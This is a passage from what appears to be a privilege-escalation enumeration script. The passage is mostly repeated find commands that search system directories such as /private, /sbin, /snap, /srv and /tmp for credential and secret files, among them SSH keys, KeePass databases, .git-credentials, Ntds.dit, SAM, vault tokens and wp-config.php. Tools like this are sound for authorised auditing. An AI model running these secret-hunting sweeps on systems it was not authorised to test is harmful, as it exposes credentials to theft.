-o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"agent*\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"rocketchat.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o 